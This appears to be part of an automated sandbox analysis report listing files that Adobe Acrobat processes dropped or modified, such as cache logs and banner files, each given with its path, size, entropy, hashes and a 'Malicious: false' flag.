SHA-512: | C3E3C68844D02591329C890C3D2A2789C4D65441CC7E1BDCC5EB0E593B762EBF476EC39FFFAD1AD6EDEED403245927119B8078EA4EFA8C7DC7A1AF23F7F17765 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 298 |
Entropy (8bit): | 5.110277991727313 |
Encrypted: | false |
SSDEEP: | 6:iO4qfuRz+q2PN72nKuAl9OmbnIFUtSqRfXWZmwsqmVkwON72nKuAl9OmbjLJ:796+vVaHAahFUtFW/cV5OaHAaSJ |
MD5: | 3E4307FFCE5375716E2F2E2A45E70372 |
SHA1: | BECE78FD7F601964CEADE4C34BC17B3AD9C50824 |
SHA-256: | 29E7AD3CBA0AD571C1F951DC8C8B13F8974CCBAFED55A2874CEAA3F3C2D9BB0E |
SHA-512: | AA5DD53F03C4902CA271A3930FFA276AD592BDF4B02C0D3A334ECBCA078F61F89858531495505989AA1A073AD11F7442E6DE32B157BA518BF744AE70C512F847 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 298 |
Entropy (8bit): | 5.110277991727313 |
Encrypted: | false |
SSDEEP: | 6:iO4qfuRz+q2PN72nKuAl9OmbnIFUtSqRfXWZmwsqmVkwON72nKuAl9OmbjLJ:796+vVaHAahFUtFW/cV5OaHAaSJ |
MD5: | 3E4307FFCE5375716E2F2E2A45E70372 |
SHA1: | BECE78FD7F601964CEADE4C34BC17B3AD9C50824 |
SHA-256: | 29E7AD3CBA0AD571C1F951DC8C8B13F8974CCBAFED55A2874CEAA3F3C2D9BB0E |
SHA-512: | AA5DD53F03C4902CA271A3930FFA276AD592BDF4B02C0D3A334ECBCA078F61F89858531495505989AA1A073AD11F7442E6DE32B157BA518BF744AE70C512F847 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 342 |
Entropy (8bit): | 5.162178514398353 |
Encrypted: | false |
SSDEEP: | 6:iO4qubM+q2PN72nKuAl9Ombzo2jMGIFUtSqidXZmwsq8UKpMVkwON72nKuAl9OmT:7wbM+vVaHAa8uFUt+dX/WpMV5OaHAa8z |
MD5: | 600E436AEDCC8553D700707EF0245C76 |
SHA1: | 086548D1A24429AFE5E62018C6CEEE2BEEF913C0 |
SHA-256: | 25FDFA58691904A1D11FD565B2872C43D71EE31F5FACFF331A169F347AF704FB |
SHA-512: | F2F57F6AC6E25D2D0533756A639717F5385078C45ABED20E038AA63B6365DC3876736B3014FB64B581E36D1614A11AB83C018CD1A719A2B4F0CEB61D7A8F4E93 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 342 |
Entropy (8bit): | 5.162178514398353 |
Encrypted: | false |
SSDEEP: | 6:iO4qubM+q2PN72nKuAl9Ombzo2jMGIFUtSqidXZmwsq8UKpMVkwON72nKuAl9OmT:7wbM+vVaHAa8uFUt+dX/WpMV5OaHAa8z |
MD5: | 600E436AEDCC8553D700707EF0245C76 |
SHA1: | 086548D1A24429AFE5E62018C6CEEE2BEEF913C0 |
SHA-256: | 25FDFA58691904A1D11FD565B2872C43D71EE31F5FACFF331A169F347AF704FB |
SHA-512: | F2F57F6AC6E25D2D0533756A639717F5385078C45ABED20E038AA63B6365DC3876736B3014FB64B581E36D1614A11AB83C018CD1A719A2B4F0CEB61D7A8F4E93 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.9684845159534285 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqXWEsBdOg2Hmcaq3QYiubcP7E4T3y:Y2sRds5pdMHZ3QYhbA7nby |
MD5: | 103A12D2A0F530FC22DE2C47C9453914 |
SHA1: | E432FE611987C1D9E89F877D6655F7C8676007B9 |
SHA-256: | 701C159E107075524496AB1C311EE11EDFD804990001DB0E6E82C65EA42B8C40 |
SHA-512: | 43D65449B108118815F747987E8C95228ED427EBF45DD605FB4985575819816F42095140858E2C726FD697B0ABB783A1D05882CF400A6AD69F41B09BEEC9C188 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\eddf5b87-08d6-4f40-b534-de81425063aa.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.9684845159534285 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqXWEsBdOg2Hmcaq3QYiubcP7E4T3y:Y2sRds5pdMHZ3QYhbA7nby |
MD5: | 103A12D2A0F530FC22DE2C47C9453914 |
SHA1: | E432FE611987C1D9E89F877D6655F7C8676007B9 |
SHA-256: | 701C159E107075524496AB1C311EE11EDFD804990001DB0E6E82C65EA42B8C40 |
SHA-512: | 43D65449B108118815F747987E8C95228ED427EBF45DD605FB4985575819816F42095140858E2C726FD697B0ABB783A1D05882CF400A6AD69F41B09BEEC9C188 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 5449 |
Entropy (8bit): | 5.250079235344718 |
Encrypted: | false |
SSDEEP: | 96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE7BIina:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzhS |
MD5: | 170C9F58FFE4F00336B176113A72E0AD |
SHA1: | D99E4C378EF992DE2F0263409DF1973C10EC8545 |
SHA-256: | 09689E78132FEC133DE997AB66484504D0C8838D2DAA6911AACD7B955A8DFF3F |
SHA-512: | FFE770EBFC1A5E506A11486C8D19CCB2669291045019ED540D03CE7E37B6371B4575CE4501CB2797CA25C8CF5A972C9D63C0F850BD8DA79055E842AB4866EB47 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 5.136143217405424 |
Encrypted: | false |
SSDEEP: | 6:iO4qllM+q2PN72nKuAl9OmbzNMxIFUtSqAAZmwsqpUGdpMVkwON72nKuAl9OmbzE:7blM+vVaHAa8jFUt//ffjMV5OaHAa84J |
MD5: | 163DCFE8AECE78BA89612A715C2500B2 |
SHA1: | 06A036F29BD120E7A90592F4900A8EB404A1741B |
SHA-256: | A5D84438E3D0BE598683B80D015DD8B5346274333FEEA9784F483F3AC1BC3545 |
SHA-512: | D3286DA3687328938BD9201A2D1BF8D1512593C2BF6B84025681022E59B07A169859EBE846BB809F595F93A2E681A9FEF1B6B6DD4DA169C120457E70482A4142 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 5.136143217405424 |
Encrypted: | false |
SSDEEP: | 6:iO4qllM+q2PN72nKuAl9OmbzNMxIFUtSqAAZmwsqpUGdpMVkwON72nKuAl9OmbzE:7blM+vVaHAa8jFUt//ffjMV5OaHAa84J |
MD5: | 163DCFE8AECE78BA89612A715C2500B2 |
SHA1: | 06A036F29BD120E7A90592F4900A8EB404A1741B |
SHA-256: | A5D84438E3D0BE598683B80D015DD8B5346274333FEEA9784F483F3AC1BC3545 |
SHA-512: | D3286DA3687328938BD9201A2D1BF8D1512593C2BF6B84025681022E59B07A169859EBE846BB809F595F93A2E681A9FEF1B6B6DD4DA169C120457E70482A4142 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.444680324887552 |
Encrypted: | false |
SSDEEP: | 384:SeNci5tViBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:h+s3OazzU89UTTgUL |
MD5: | 348DC159EEB5CB3B25A7E4085CDA33B0 |
SHA1: | A64A78AB12E2FC981B3C9EF04B4F0671CDF18D42 |
SHA-256: | B90C0FA56C3C9770817A8A193B7AB8C95B2D0C80F1F7263509B142C4C8984EE2 |
SHA-512: | F714523CD2923D9FC89B2789B28BF46442A8B8B75ECC5B0B2B797AC26C2D0FBA441DD8998BF5EF64557B504ECF7B85C1A99B726823F9DAA0B41C48EFED4F4E49 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.215122802789825 |
Encrypted: | false |
SSDEEP: | 24:7+tZOg2OnuwKkqLLzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmU:7MKOnCkqPmFTIF3XmHjBoGGR+jMz+Lhk |
MD5: | 6262276F78787609CE1872AC1278DA55 |
SHA1: | 3C94D4B61699950E5672424841D54EA685D3DB03 |
SHA-256: | 8277113BB723A493DD758E787B661EC1E5D50B3352FDED8CDC041A57B5BAE103 |
SHA-512: | 12E2372E10D79025B11E11C2F40AE53E71DFAC24D5A953EF02C68679D5C4B9B64C82B0A7AA6ED7EC6C496AFDE70BFC42510F76AB1BDE365E921C4F58E1402C0F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.728204828358771 |
Encrypted: | false |
SSDEEP: | 3:kkFkl25kzxytfllXlE/HT8krlh/tNNX8RolJuRdxLlGB9lQRYwpDdt:kKv5k8eT8SRNMa8RdWBwRd |
MD5: | E9784A0F40BCFBE24465A9530FD6EE82 |
SHA1: | 0A6A877D973050E69FC5268254B599CC2174C8D3 |
SHA-256: | B43B127E379BFEA0F73EA5AE86C542E83A2F1C9CDBB757C95E2320DF8A5D9DDE |
SHA-512: | B2AE829C397EB525F1053DCB16582D48E815EFBDD827121775AE164DBF3AF4A126C88AD350D2B595CD33E6ACE9065EF094C78BF26B5F8DBF6FDA12E87B4E8F91 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.230795304831838 |
Encrypted: | false |
SSDEEP: | 6:kKjL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:LiDImsLNkPlE99SNxAhUe/3 |
MD5: | 2FFF91EC02C0F843C67EDE6E70FD611F |
SHA1: | AF9A37296423BACC3B8B2A6D6F06E37F27112D22 |
SHA-256: | 55C9AD369B7C193EE924D9627D55ADA17F35DBDC9E3B57DC6A6AFF08351EB06E |
SHA-512: | A2781E3BA9E9A05645114DC6239FFD6AB78926EE60A204F125603E18FC8A9E34E5C63DAED3F00D9956BD0721A9998DCC8178418E4CCA383164484C69574C7E35 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.354964352570843 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXwGWcc2vnZiQ0YceoAvJM3g98kUwPeUkwRe9:YvXKXpWf2vczGMbLUkee9 |
MD5: | 0D4EBC556F0D6E4143A9C6FC86F95C16 |
SHA1: | 54356F4C07B699E194D454105501093C673B36CC |
SHA-256: | B4A2D42F32BD57550F7F30B404308C0C7DEBBE2EF49FEEC9FA9BF4A59CC1D23F |
SHA-512: | 2D2CF5A71A5A391AE2CC7A9EACF3493E67A2DF4DC5272483EA9A898B97861DD0E722EB2690AC4F1E3B32D4534674F1BC84A466B71C9A8348193A0EE015AE78F3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.31029633374981 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXwGWcc2vnZiQ0YceoAvJfBoTfXpnrPeUkwRe9:YvXKXpWf2vczGWTfXcUkee9 |
MD5: | 47062EC0184FBDC9CAF444CCBDC6B10D |
SHA1: | A7FABCC88A7A43DEED522B1FF17D0D10102740F7 |
SHA-256: | 6880EF1BDFB965ADF185504FFD4E2BD71320CF9923BCE54EBF314B180D53DD23 |
SHA-512: | AF49F5EEF34E1C70C7586E07CDA499AD0AB42F09892B3697786C1ACB216B9B44F96841F21FE1C608A69B9A776EA7BBE8B8F24BF5380437D273A7F7B5ABF6B075 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.28711087993394 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXwGWcc2vnZiQ0YceoAvJfBD2G6UpnrPeUkwRe9:YvXKXpWf2vczGR22cUkee9 |
MD5: | 10951EE5251260A1F3FAFB39408F5506 |
SHA1: | C05F41AB2754F41F6F0BBFBE8515045AF3AEA4D5 |
SHA-256: | C33F97D208D68F3C0AA481525BBF57850694876521BE0976640594EEE266A9A7 |
SHA-512: | 269E8949AD59DD9FB81D2854758EBDFB24204CCC2C819610E07ACB6E80723A1B3982465C54721BE693CD2A637645F8F3D5AB44BE758378BB04A9AC996475B324 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.334692225296312 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXwGWcc2vnZiQ0YceoAvJfPmwrPeUkwRe9:YvXKXpWf2vczGH56Ukee9 |
MD5: | 56AB8AC16F9C788F9A9AA8F4918B37EC |
SHA1: | 71CBD7E8D013849CD0695023CF3DA674C219136E |
SHA-256: | ACB5917CF554DC7FCE64BAD0E383FF49686202072178D0EC0599B5D163DB1E41 |
SHA-512: | EAA627B1C0748B071E6AFB5408B5EF4DF1CD445E5130D11E47B990A40CEA11CF402634709F45029D498A4AA35F2AFB241BF7B2C3B5C12FA215350C82FC6C9F8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.686504266751499 |
Encrypted: | false |
SSDEEP: | 24:Yv6X4fZopLgE9cQx8LennAvzBvkn0RCmK8czOCCSS9:Yv9Shgy6SAFv5Ah8cv/E |
MD5: | 62276F4466C60314BC9DCC66F8BD5D9F |
SHA1: | 6F955AAE74DA53D955275F40497C61EC1FAB70CE |
SHA-256: | F95A656709C95323E475760C94FC3134A1EE98ECC48D07E8D20BEC16B0279D15 |
SHA-512: | 028C83B49BE4C79C44F96182959D0718E1A0B33D1997485BB809AF2E1C54D345C962BFB42A7BB40644ACCF7C04DA54FEDFBDDCB95F348AB23767424918F4B6EA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.283625696453389 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXwGWcc2vnZiQ0YceoAvJf8dPeUkwRe9:YvXKXpWf2vczGU8Ukee9 |
MD5: | C9C51097D3E87C19526DDA825537E43A |
SHA1: | 65B8B2D31946A072DD6B4777E7B09B06169935CC |
SHA-256: | ED65C33FE4264C204A923F89A4DAA5256C33FD470E84757CDFF8778A596B5CA0 |
SHA-512: | AE0B9A020228A9B085EF28235C9D7F6E74820861C69510FABCEEBFC514A9A05E04628F663A169E0429B30A41E3D0E838CC7A0A7E2B3570EBE9989C69719094CD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.287045974519071 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXwGWcc2vnZiQ0YceoAvJfQ1rPeUkwRe9:YvXKXpWf2vczGY16Ukee9 |
MD5: | 56D20B4CB92021CD4AE03C653F763122 |
SHA1: | 41DDA63FFC2B24E66B6401DDFAD7F13B074EE977 |
SHA-256: | 36D12FCADDE0676CBFE63EDE3AB43964E911B038B77210B58A6DA0CB71472922 |
SHA-512: | 631303C88621DCBDC2753C76A950C0182184F802B301B835D8799AE7C54952D8DE787009E8120942977989B2A1E3D451486E5FC63C1C8109CB6482A7FD399E14 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.29452964966978 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXwGWcc2vnZiQ0YceoAvJfFldPeUkwRe9:YvXKXpWf2vczGz8Ukee9 |
MD5: | BB78117E6CBD28FE7195BE1AC0779AF2 |
SHA1: | BAD5B12B5C1E72D8B17538E53B40FDA06048BE24 |
SHA-256: | C59DC99C82FE22A906BC7BF33E6F0C9AA2C2F23D53E4146028EF00AC5BEA1AFD |
SHA-512: | DB53F6A92FCCE42015E5E7EDD4B2623633D9A59272B97BDA6F51331CD40BC3CA9D219A9904CC20731DD5C38F528EA4F9C5F90A1D1B8A492A4012834E3D839317 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.312458779245623 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXwGWcc2vnZiQ0YceoAvJfzdPeUkwRe9:YvXKXpWf2vczGb8Ukee9 |
MD5: | 7329E6ACDE84988E9066FCE48C782DDD |
SHA1: | C3F0D60CE0F9B15CF8D485D680D89C08CD979059 |
SHA-256: | 8DE27FE056DCEF9B85FD155E1EE718CF495CE7393E7F2F03B8C73C488AE1B7BF |
SHA-512: | FF5EF56C8122C327406598574E77713A09E2C9EE67C1D287BF0409AE070E3BF5EADC4146CE08A69577F8907D6EF361FE887CD738AD9EB5472284ED6C40C5B0A7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.292959168904993 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXwGWcc2vnZiQ0YceoAvJfYdPeUkwRe9:YvXKXpWf2vczGg8Ukee9 |
MD5: | DEB86C22D6035C36E754D8A257302A75 |
SHA1: | 09CCACAEF5CE81594C535312F64854985D4EEE81 |
SHA-256: | 3842E95BB64FF748AB662E466EA5FD0CF71DF12B2319579350A5499A9E01BB82 |
SHA-512: | 6CA174AFBF09CE58A9BA8AE81B2747C1F11674E0E9AE6BF652664D91E7F459619CC0240EDDEE53F1772AF5AEDBABC78424F426684BC7E5B26A6F903FE8160BB8 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.278567881900899 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXwGWcc2vnZiQ0YceoAvJf+dPeUkwRe9:YvXKXpWf2vczG28Ukee9 |
MD5: | 4D8EE18E464854510762FB91F6EF58E2 |
SHA1: | FA6DC563A66B7A1046BD7945834EC1B4F7BF5EFC |
SHA-256: | 45C0759B701544ADB580DBF0D953D9E2488B1882CCA7E558BEE7705EF9338257 |
SHA-512: | 449B2A23339FCAA3E9A24283F96B2F11588A65D96993AADA68FFFD8C83DDB43B58AD5CE0E96930BFB87A2F3E8EA32C11FDBB037788B59795644E92D1F5A37F82 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.276554657170574 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXwGWcc2vnZiQ0YceoAvJfbPtdPeUkwRe9:YvXKXpWf2vczGDV8Ukee9 |
MD5: | ED061268A3425E63613576CA21A629E3 |
SHA1: | EA9B6CAE8FAC599F7646BA90058A82D991201B23 |
SHA-256: | ED624D004F0AE67BB19E1B5AED33E25B4C7A97F1CE26FB6DB73107F3BF331A20 |
